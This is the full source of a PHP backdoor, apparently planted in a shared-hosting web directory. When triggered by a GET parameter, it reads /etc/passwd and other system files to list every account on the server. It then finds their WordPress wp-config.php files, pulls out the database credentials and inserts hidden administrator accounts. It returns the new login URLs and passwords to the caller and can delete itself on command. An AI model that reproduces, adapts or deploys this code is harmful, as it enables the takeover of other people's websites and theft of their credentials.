File: /home/hitehp/public_html/AOXEN_BOT.php
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('log_errors', 0);
if (isset($_GET['GET']) && $_GET['GET'] === 'DE') {
$current_file = __FILE__;
if (@unlink($current_file)) {
header('Content-Type: application/json');
echo json_encode(['success' => true]);
} else {
header('Content-Type: application/json');
http_response_code(500);
echo json_encode(['success' => false]);
}
exit;
}
if (isset($_GET['GET']) && $_GET['GET'] === 'WP') {
$scan_result = frida_scan_all_users_wpconfig();
if (empty($scan_result['wp_configs_found'])) {
header('Content-Type: application/json');
echo json_encode(['success' => false]);
exit;
}
$successful_results = [];
foreach ($scan_result['wp_configs_found'] as $config) {
$config_path = $config['path'];
$username = '';
$letters = 'abcdefghijklmnopqrstuvwxyz';
for ($i = 0; $i < 11; $i++) {
$username .= $letters[rand(0, strlen($letters) - 1)];
}
$password = '';
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$special_chars = '@!#$%&*';
$password .= $special_chars[rand(0, strlen($special_chars) - 1)];
for ($i = 1; $i < 14; $i++) {
if ($i < 10) {
$password .= $chars[rand(0, strlen($chars) - 1)];
} else {
$all_chars = $chars . $special_chars;
$password .= $all_chars[rand(0, strlen($all_chars) - 1)];
}
}
$password = str_shuffle($password);
$admin_email = $username . '@' . rand(100, 999) . '.com';
$result = frida_create_wp_admin($config_path, $username, $password, $admin_email);
if ($result['success']) {
$creds = $result['credentials'];
$successful_results[] = $creds['wp_admin_url'] . ':' . $creds['username'] . ':' . $creds['password'];
}
}
header('Content-Type: application/json');
if (!empty($successful_results)) {
echo json_encode(['success' => true, 'results' => $successful_results]);
} else {
echo json_encode(['success' => false]);
}
exit;
}
header('Content-Type: application/json');
http_response_code(400);
echo json_encode(['success' => false]);
function frida_detect_home_base() {
$paths_to_check = [
getcwd(),
__FILE__,
$_SERVER['DOCUMENT_ROOT'] ?? '',
$_SERVER['SCRIPT_FILENAME'] ?? ''
];
$detected_bases = [];
foreach ($paths_to_check as $path) {
if (empty($path)) continue;
if (preg_match('/^\/(home\d*|var\/www)\/([^\/]+)/', $path, $matches)) {
$base = '/' . $matches[1] . '/';
$detected_bases[$base] = true;
}
}
if (is_readable('/etc/passwd')) {
$passwd_content = @file_get_contents('/etc/passwd');
if ($passwd_content) {
$lines = explode("\n", $passwd_content);
foreach ($lines as $line) {
if (empty($line) || $line[0] === '#') continue;
$parts = explode(':', $line);
if (count($parts) >= 6) {
$home_dir = $parts[5];
if (preg_match('/^\/(home\d*|var\/www)\//', $home_dir, $matches)) {
$base = '/' . $matches[1] . '/';
$detected_bases[$base] = true;
}
}
}
}
}
$named_configs = ['/etc/named.conf', '/etc/bind/named.conf', '/var/named/named.conf'];
foreach ($named_configs as $named_file) {
if (is_readable($named_file)) {
$content = @file_get_contents($named_file);
if ($content) {
if (preg_match_all('/file\s+"([^"]+)"/', $content, $matches)) {
foreach ($matches[1] as $zone_file) {
$zone_path = dirname($zone_file);
if (preg_match('/^\/(home\d*|var\/www)\//', $zone_path, $m)) {
$base = '/' . $m[1] . '/';
$detected_bases[$base] = true;
}
}
}
}
}
}
if (empty($detected_bases)) {
$detected_bases['/home/'] = true;
}
$all_bases = [];
foreach (array_keys($detected_bases) as $base) {
$all_bases[] = $base;
if (preg_match('/^\/home\/?$/', $base)) {
for ($i = 2; $i <= 5; $i++) {
$alt_base = '/home' . $i . '/';
if (@is_dir($alt_base)) {
$all_bases[] = $alt_base;
}
}
}
}
return array_unique($all_bases);
}
function frida_get_current_user() {
$detected_users = [];
$home_bases = frida_detect_home_base();
$current_dir = getcwd();
foreach ($home_bases as $home_base) {
if (preg_match('/^' . preg_quote($home_base, '/') . '([^\/]+)/', $current_dir, $matches)) {
$detected_users[$matches[1]] = $home_base . $matches[1];
}
}
$file_path = __FILE__;
foreach ($home_bases as $home_base) {
if (preg_match('/^' . preg_quote($home_base, '/') . '([^\/]+)/', $file_path, $matches)) {
$detected_users[$matches[1]] = $home_base . $matches[1];
}
}
$doc_root = $_SERVER['DOCUMENT_ROOT'] ?? '';
if (!empty($doc_root)) {
foreach ($home_bases as $home_base) {
if (preg_match('/^' . preg_quote($home_base, '/') . '([^\/]+)/', $doc_root, $matches)) {
$detected_users[$matches[1]] = $home_base . $matches[1];
}
}
}
$script_file = $_SERVER['SCRIPT_FILENAME'] ?? '';
if (!empty($script_file)) {
foreach ($home_bases as $home_base) {
if (preg_match('/^' . preg_quote($home_base, '/') . '([^\/]+)/', $script_file, $matches)) {
$detected_users[$matches[1]] = $home_base . $matches[1];
}
}
}
$env_user = @getenv('USER') ?: @get_current_user();
if (!empty($env_user)) {
foreach ($home_bases as $home_base) {
$home_path = $home_base . $env_user;
if (@is_dir($home_path)) {
$detected_users[$env_user] = $home_path;
break;
}
}
}
return $detected_users;
}
function frida_posix_users() {
$users = frida_get_current_user();
$home_bases = frida_detect_home_base();
$home_pattern = '/^(' . implode('|', array_map(function($base) {
return preg_quote(rtrim($base, '/'), '/');
}, $home_bases)) . '|var\/www)\//';
if (function_exists('posix_getpwuid')) {
$uid_ranges = [
[1000, 10000],
[500, 1000],
[10000, 65535]
];
foreach ($uid_ranges as $range) {
list($start, $end) = $range;
for ($uid = $start; $uid < $end; $uid++) {
$user_info = @posix_getpwuid($uid);
if ($user_info && !empty($user_info['name']) && !empty($user_info['dir'])) {
$username = $user_info['name'];
$home_dir = $user_info['dir'];
if (preg_match($home_pattern, $home_dir)) {
$users[$username] = $home_dir;
}
}
if ($uid % 500 === 0) {
usleep(500);
}
}
}
}
if (empty($users) && is_readable('/etc/passwd')) {
$passwd_content = @file_get_contents('/etc/passwd');
if ($passwd_content) {
$lines = explode("\n", $passwd_content);
foreach ($lines as $line) {
if (empty($line) || $line[0] === '#') continue;
$parts = explode(':', $line);
if (count($parts) >= 6) {
$username = $parts[0];
$home_dir = $parts[5];
if (preg_match($home_pattern, $home_dir)) {
$users[$username] = $home_dir;
}
}
}
}
}
if (empty($users)) {
$result = @shell_exec('cat /etc/passwd 2>/dev/null | grep -E "^[^:]+:[^:]*:[0-9]{3,}:" | cut -d: -f1,6');
if ($result) {
$lines = explode("\n", trim($result));
foreach ($lines as $line) {
$parts = explode(':', $line);
if (count($parts) >= 2) {
$username = trim($parts[0]);
$home_dir = trim($parts[1]);
if (!empty($username) && !empty($home_dir) && preg_match($home_pattern, $home_dir)) {
$users[$username] = $home_dir;
}
}
}
}
}
return $users;
}
function frida_check_openbasedir() {
$restrictions = [];
$open_basedir = ini_get('open_basedir');
if (!empty($open_basedir)) {
$restrictions['open_basedir'] = explode(':', $open_basedir);
} else {
$restrictions['open_basedir'] = null;
}
$disable_functions = ini_get('disable_functions');
$restrictions['disable_functions'] = !empty($disable_functions) ? explode(',', str_replace(' ', '', $disable_functions)) : [];
$safe_mode = ini_get('safe_mode');
$restrictions['safe_mode'] = $safe_mode;
$test_paths = [
'/home',
'/var/www',
'/tmp',
'/etc/passwd',
'/root'
];
$restrictions['accessible_paths'] = [];
foreach ($test_paths as $test_path) {
if (@is_readable($test_path)) {
$restrictions['accessible_paths'][] = $test_path;
}
}
return $restrictions;
}
function frida_find_wp_configs($path = '') {
if (empty($path)) {
$path = getcwd() ?: ($_SERVER['DOCUMENT_ROOT'] ?? '/');
}
$path = realpath($path);
if (!$path || !is_readable($path)) {
return [];
}
$wp_configs = [];
try {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
$iterator->setMaxDepth(5);
foreach ($iterator as $file) {
if ($file->isFile() && $file->getFilename() === 'wp-config.php') {
$wp_configs[] = $file->getPathname();
if (count($wp_configs) >= 100) break;
}
}
} catch (Exception $e) {
$glob_patterns = [
$path . 'wp-config.php',
$path . '*/wp-config.php',
$path . '*/*/wp-config.php',
$path . '*/*/*/wp-config.php'
];
foreach ($glob_patterns as $pattern) {
$found = glob($pattern);
if ($found) {
$wp_configs = array_merge($wp_configs, $found);
}
if (count($wp_configs) >= 100) break;
}
}
return array_unique($wp_configs);
}
function frida_parse_wp_config($config_file) {
if (!file_exists($config_file)) {
return ['error' => 'File does not exist: ' . $config_file];
}
if (!is_readable($config_file)) {
return ['error' => 'File not readable: ' . $config_file];
}
$content = @file_get_contents($config_file);
if (!$content) {
$error = error_get_last();
return ['error' => 'Cannot read file: ' . ($error['message'] ?? 'Unknown error')];
}
if (strlen($content) < 50) {
return ['error' => 'File too small (' . strlen($content) . ' bytes)'];
}
$credentials = [];
if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['host'] = trim($matches[1]);
} elseif (preg_match("/DB_HOST.*?=.*?['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['host'] = trim($matches[1]);
} else {
$credentials['host'] = 'localhost';
}
if ($credentials['host'] === 'localhost') {
$credentials['host'] = '127.0.0.1';
}
if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['name'] = trim($matches[1]);
} elseif (preg_match("/DB_NAME.*?=.*?['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['name'] = trim($matches[1]);
} else {
return ['error' => 'DB_NAME not found in wp-config.php'];
}
if (empty($credentials['name'])) {
return ['error' => 'DB_NAME is empty'];
}
if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['user'] = trim($matches[1]);
} elseif (preg_match("/DB_USER.*?=.*?['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['user'] = trim($matches[1]);
} else {
return ['error' => 'DB_USER not found in wp-config.php'];
}
if (empty($credentials['user'])) {
return ['error' => 'DB_USER is empty'];
}
if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['password'] = trim($matches[1]);
} elseif (preg_match("/DB_PASSWORD.*?=.*?['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['password'] = trim($matches[1]);
} else {
$credentials['password'] = '';
}
if (preg_match("/\$table_prefix\s*=\s*['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['prefix'] = trim($matches[1]);
} elseif (preg_match("/table_prefix\s*=\s*['\"](.*?)['\"]/i", $content, $matches)) {
$credentials['prefix'] = trim($matches[1]);
} else {
$credentials['prefix'] = 'wp_';
}
return $credentials;
}
function frida_get_site_url($pdo, $prefix) {
try {
$stmt = $pdo->query("SELECT option_value FROM {$prefix}options WHERE option_name = 'home' OR option_name = 'siteurl' LIMIT 1");
$result = $stmt->fetchColumn();
return $result ?: '';
} catch (Exception $e) {
return '';
}
}
function frida_wp_hash_password($password) {
return password_hash($password, PASSWORD_BCRYPT);
}
function frida_create_wp_admin($config_path, $admin_username = 'Dubick_TT', $admin_password = null, $admin_email = null) {
if (!$admin_password) {
$admin_password = 'Dubick_TT_' . rand(1000, 9999);
}
if (!$admin_email) {
$admin_email = 'admin@shot-bot-list' . rand(100, 999) . '.com';
}
$credentials = frida_parse_wp_config($config_path);
if ($credentials === null) {
return ['success' => false, 'message' => 'Parse error: Function returned NULL', 'url' => '', 'credentials' => null];
}
if (isset($credentials['error'])) {
return ['success' => false, 'message' => 'Parse error: ' . $credentials['error'], 'url' => '', 'credentials' => null];
}
if (empty($credentials) || !is_array($credentials)) {
return ['success' => false, 'message' => 'Parse error: Invalid return format', 'url' => '', 'credentials' => null];
}
if (empty($credentials['name'])) {
return ['success' => false, 'message' => 'Parse error: DB_NAME is empty or missing', 'url' => '', 'credentials' => null];
}
try {
$pdo = null;
$last_error = null;
$hosts_to_try = [$credentials['host']];
if ($credentials['host'] === '127.0.0.1') {
$hosts_to_try[] = 'localhost';
} elseif ($credentials['host'] === 'localhost') {
$hosts_to_try[] = '127.0.0.1';
}
foreach ($hosts_to_try as $host) {
try {
$dsn = "mysql:host={$host};dbname={$credentials['name']};charset=utf8";
$pdo = new PDO(
$dsn,
$credentials['user'],
$credentials['password'],
[
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_TIMEOUT => 5,
PDO::ATTR_PERSISTENT => false
]
);
break;
} catch (PDOException $e) {
$last_error = $e->getMessage();
if (strpos($last_error, 'not allowed to connect') !== false && count($hosts_to_try) > 1) {
continue;
}
if (count($hosts_to_try) === 1 || strpos($last_error, 'not allowed') === false) {
return ['success' => false, 'message' => 'MySQL connection failed: ' . $last_error, 'url' => '', 'credentials' => null];
}
}
}
if (!$pdo) {
return ['success' => false, 'message' => 'MySQL connection failed (tried: ' . implode(', ', $hosts_to_try) . '): ' . $last_error, 'url' => '', 'credentials' => null];
}
$prefix = $credentials['prefix'];
try {
$stmt = $pdo->query("SHOW TABLES LIKE '{$prefix}users'");
if (!$stmt->fetch()) {
return ['success' => false, 'message' => "Table '{$prefix}users' does not exist", 'url' => '', 'credentials' => null];
}
} catch (Exception $e) {
return ['success' => false, 'message' => 'Cannot check table: ' . $e->getMessage(), 'url' => '', 'credentials' => null];
}
$stmt = $pdo->prepare("SELECT ID FROM {$prefix}users WHERE user_login = ?");
$stmt->execute([$admin_username]);
if ($stmt->fetch()) {
return ['success' => false, 'message' => 'Admin already exists', 'url' => '', 'credentials' => null];
}
$site_url = frida_get_site_url($pdo, $prefix);
$user_data = [
'user_login' => $admin_username,
'user_pass' => frida_wp_hash_password($admin_password),
'user_nicename' => $admin_username,
'user_email' => $admin_email,
'user_url' => '',
'user_registered' => date('Y-m-d H:i:s'),
'user_activation_key' => '',
'user_status' => 0,
'display_name' => 'Dubick TTTT'
];
try {
$stmt = $pdo->query("SHOW COLUMNS FROM {$prefix}users WHERE Field = 'ID'");
$id_col = $stmt->fetch(PDO::FETCH_ASSOC);
if ($id_col) {
$is_auto_increment = (strpos(strtolower($id_col['Extra'] ?? ''), 'auto_increment') !== false);
$is_nullable = (strtolower($id_col['Null'] ?? '') === 'yes');
if (!$is_auto_increment && !$is_nullable) {
$stmt = $pdo->query("SELECT MAX(ID) as max_id FROM {$prefix}users");
$result = $stmt->fetch(PDO::FETCH_ASSOC);
$max_id = $result['max_id'] ?? 0;
$user_data['ID'] = (int)$max_id + 1;
}
}
} catch (Exception $e) {
}
$placeholders = ':' . implode(', :', array_keys($user_data));
$stmt = $pdo->prepare("INSERT INTO {$prefix}users (" . implode(', ', array_keys($user_data)) . ") VALUES ($placeholders)");
$stmt->execute($user_data);
$user_id = $pdo->lastInsertId() ?: ($user_data['ID'] ?? null);
$capabilities = serialize(['administrator' => true]);
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities]);
$stmt->execute([$user_id, $prefix . 'user_level', '10']);
$stmt->execute([$user_id, 'nickname', $admin_username]);
$stmt->execute([$user_id, 'first_name', 'Dubick']);
$stmt->execute([$user_id, 'last_name', 'медведÑ']);
return [
'success' => true,
'message' => 'Admin created successfully',
'url' => $site_url,
'credentials' => [
'username' => $admin_username,
'password' => $admin_password,
'email' => $admin_email,
'site_url' => $site_url,
'wp_admin_url' => rtrim($site_url, '/') . '/wp-admin'
]
];
} catch (Exception $e) {
return ['success' => false, 'message' => $e->getMessage(), 'url' => '', 'credentials' => null];
}
}
function frida_scan_all_users_wpconfig() {
@set_time_limit(300);
$start_time = microtime(true);
$max_time_per_user = 5.0;
$users = frida_posix_users();
$results = [
'total_users' => count($users),
'scanned_users' => 0,
'wp_configs_found' => [],
'skipped_users' => [],
'debug_info' => [],
'user_debug' => []
];
$quick_paths = [
'public_html/wp-config.php',
'www/wp-config.php',
'htdocs/wp-config.php',
'html/wp-config.php',
'web/wp-config.php',
'public/wp-config.php',
'wp-config.php',
'domains/*/public_html/wp-config.php',
'domains/*/www/wp-config.php',
'domains/*/html/wp-config.php',
];
$use_find_command = function_exists('exec') && !in_array('exec', explode(',', ini_get('disable_functions')));
$detected_home_bases = frida_detect_home_base();
foreach ($users as $username => $home_dir) {
$user_start = microtime(true);
$home_dir = rtrim($home_dir, '/') . '/';
$results['scanned_users']++;
$user_debug = [
'username' => $username,
'home_dir' => $home_dir,
'paths_checked' => 0,
'dirs_checked' => 0,
'glob_patterns_tried' => 0,
'timeout' => false,
'found_count' => 0
];
$check_dirs = [$home_dir];
$current_base = null;
foreach ($detected_home_bases as $base) {
if (strpos($home_dir, $base) === 0) {
$current_base = $base;
break;
}
}
if ($current_base) {
$username_from_path = basename($home_dir);
foreach ($detected_home_bases as $alt_base) {
if ($alt_base !== $current_base) {
$alt_path = $alt_base . $username_from_path . '/';
if (@is_dir($alt_path)) {
$check_dirs[] = $alt_path;
}
}
}
}
$user_debug['dirs_checked'] = count($check_dirs);
$user_found_paths = [];
foreach ($check_dirs as $check_dir) {
foreach ($quick_paths as $quick_path) {
if (strpos($quick_path, '*') !== false) {
$pattern = rtrim($check_dir, '/') . '/' . ltrim($quick_path, '/');
$user_debug['glob_patterns_tried']++;
$found_files = @glob($pattern);
if ($found_files && is_array($found_files)) {
foreach ($found_files as $found_file) {
$user_debug['paths_checked']++;
if (@file_exists($found_file) && @is_file($found_file)) {
$is_duplicate = false;
foreach ($results['wp_configs_found'] as $existing) {
if ($existing['path'] === $found_file) {
$is_duplicate = true;
break;
}
}
if (!$is_duplicate) {
$results['wp_configs_found'][] = [
'user' => $username,
'home' => $check_dir,
'path' => $found_file
];
$user_debug['found_count']++;
}
}
}
}
continue;
}
$full_path = rtrim($check_dir, '/') . '/' . ltrim($quick_path, '/');
$user_debug['paths_checked']++;
if (@file_exists($full_path) && @is_file($full_path)) {
$path_key = $username . '|' . $full_path;
if (!isset($user_found_paths[$path_key])) {
$user_found_paths[$path_key] = true;
$is_duplicate = false;
foreach ($results['wp_configs_found'] as $existing) {
if ($existing['user'] === $username) {
$existing_dir = dirname($existing['path']);
$current_dir = dirname($full_path);
if (strpos($existing['path'], '/public_html/wp-config.php') !== false &&
strpos($full_path, '/www/wp-config.php') !== false &&
$existing_dir === $current_dir) {
$is_duplicate = true;
break;
}
if (strpos($existing['path'], '/www/wp-config.php') !== false &&
strpos($full_path, '/public_html/wp-config.php') !== false &&
$existing_dir === $current_dir) {
foreach ($results['wp_configs_found'] as $idx => $item) {
if ($item['user'] === $username && $item['path'] === $existing['path']) {
unset($results['wp_configs_found'][$idx]);
$results['wp_configs_found'] = array_values($results['wp_configs_found']);
break;
}
}
break;
}
}
}
if (!$is_duplicate) {
$results['wp_configs_found'][] = [
'user' => $username,
'home' => $check_dir,
'path' => $full_path
];
$user_debug['found_count']++;
}
}
}
}
if ((microtime(true) - $user_start) < $max_time_per_user) {
$glob_patterns = [
$check_dir . '*/wp-config.php',
$check_dir . '*/*/wp-config.php',
$check_dir . 'public_html/*/wp-config.php',
$check_dir . 'www/*/wp-config.php',
$check_dir . 'html/*/wp-config.php',
$check_dir . 'web/*/wp-config.php',
];
foreach ($glob_patterns as $pattern) {
if ((microtime(true) - $user_start) > $max_time_per_user) break;
$found_files = @glob($pattern);
if ($found_files && is_array($found_files)) {
foreach ($found_files as $found_file) {
if (@file_exists($found_file) && @is_file($found_file)) {
$is_duplicate = false;
foreach ($results['wp_configs_found'] as $existing) {
if ($existing['path'] === $found_file) {
$is_duplicate = true;
break;
}
}
if (!$is_duplicate) {
$results['wp_configs_found'][] = [
'user' => $username,
'home' => $check_dir,
'path' => $found_file
];
}
}
}
}
}
}
}
if ((microtime(true) - $user_start) < $max_time_per_user) {
foreach ($check_dirs as $check_dir) {
$domains_dir = $check_dir . 'domains/';
if (@is_dir($domains_dir)) {
$domain_glob_patterns = [
$domains_dir . '*/wp-config.php',
$domains_dir . '*/public_html/wp-config.php',
$domains_dir . '*/www/wp-config.php',
$domains_dir . '*/html/wp-config.php',
$domains_dir . '*/*/wp-config.php',
$domains_dir . '*/public_html/*/wp-config.php',
$domains_dir . '*/www/*/wp-config.php',
];
foreach ($domain_glob_patterns as $pattern) {
if ((microtime(true) - $user_start) > $max_time_per_user) break;
$user_debug['glob_patterns_tried']++;
$found_files = @glob($pattern);
if ($found_files && is_array($found_files)) {
foreach ($found_files as $found_file) {
if (@file_exists($found_file) && @is_file($found_file)) {
$is_duplicate = false;
foreach ($results['wp_configs_found'] as $existing) {
if ($existing['path'] === $found_file) {
$is_duplicate = true;
break;
}
}
if (!$is_duplicate) {
$results['wp_configs_found'][] = [
'user' => $username,
'home' => $check_dir,
'path' => $found_file
];
$user_debug['found_count']++;
}
}
}
}
}
}
}
}
if ((microtime(true) - $user_start) < $max_time_per_user && $use_find_command) {
foreach ($check_dirs as $check_dir) {
$find_command = "find " . escapeshellarg($check_dir) . " -maxdepth 4 -type f -name 'wp-config.php' 2>/dev/null | head -20";
$output = [];
$return_var = 0;
@exec($find_command, $output, $return_var);
if (!empty($output)) {
foreach ($output as $found_file) {
$found_file = trim($found_file);
if (empty($found_file)) continue;
if (@file_exists($found_file)) {
$is_duplicate = false;
foreach ($results['wp_configs_found'] as $existing) {
if ($existing['path'] === $found_file) {
$is_duplicate = true;
break;
}
}
if (!$is_duplicate) {
$results['wp_configs_found'][] = [
'user' => $username,
'home' => $check_dir,
'path' => $found_file
];
$user_debug['found_count']++;
}
}
}
}
}
}
if ((microtime(true) - $user_start) < $max_time_per_user) {
foreach ($check_dirs as $check_dir) {
$ultra_glob_patterns = [
$check_dir . '**/wp-config.php',
$check_dir . '*/wp-config.php',
$check_dir . '*/*/wp-config.php',
$check_dir . '*/*/*/wp-config.php',
$check_dir . '*/*/*/*/wp-config.php',
$check_dir . 'public_html/**/wp-config.php',
$check_dir . 'www/**/wp-config.php',
$check_dir . 'html/**/wp-config.php',
$check_dir . 'web/**/wp-config.php',
$check_dir . 'domains/*/wp-config.php',
$check_dir . 'domains/*/public_html/wp-config.php',
$check_dir . 'domains/*/www/wp-config.php',
$check_dir . 'domains/*/*/wp-config.php',
$check_dir . 'domains/*/public_html/*/wp-config.php',
];
foreach ($ultra_glob_patterns as $pattern) {
if ((microtime(true) - $user_start) > $max_time_per_user) break;
$user_debug['glob_patterns_tried']++;
$found_files = @glob($pattern);
if ($found_files && is_array($found_files)) {
foreach ($found_files as $found_file) {
if (@file_exists($found_file) && @is_file($found_file)) {
$is_duplicate = false;
foreach ($results['wp_configs_found'] as $existing) {
if ($existing['path'] === $found_file) {
$is_duplicate = true;
break;
}
}
if (!$is_duplicate) {
$results['wp_configs_found'][] = [
'user' => $username,
'home' => $check_dir,
'path' => $found_file
];
}
}
}
}
}
}
}
if ((microtime(true) - $user_start) > $max_time_per_user) {
$results['skipped_users'][] = $username;
$user_debug['timeout'] = true;
}
if ($user_debug['found_count'] > 0 || $results['scanned_users'] <= 50) {
$user_debug['time_taken'] = round(microtime(true) - $user_start, 3);
$results['user_debug'][] = $user_debug;
}
if ((microtime(true) - $start_time) > 270) {
break;
}
}
$open_basedir_info = frida_check_openbasedir();
$results['debug_info'] = [
'total_time' => round(microtime(true) - $start_time, 2),
'avg_time_per_user' => $results['scanned_users'] > 0 ? round((microtime(true) - $start_time) / $results['scanned_users'], 3) : 0,
'skipped_count' => count($results['skipped_users']),
'open_basedir' => $open_basedir_info['open_basedir'] ?? null,
'open_basedir_restricted' => !empty($open_basedir_info['open_basedir'])
];
return $results;
}
?>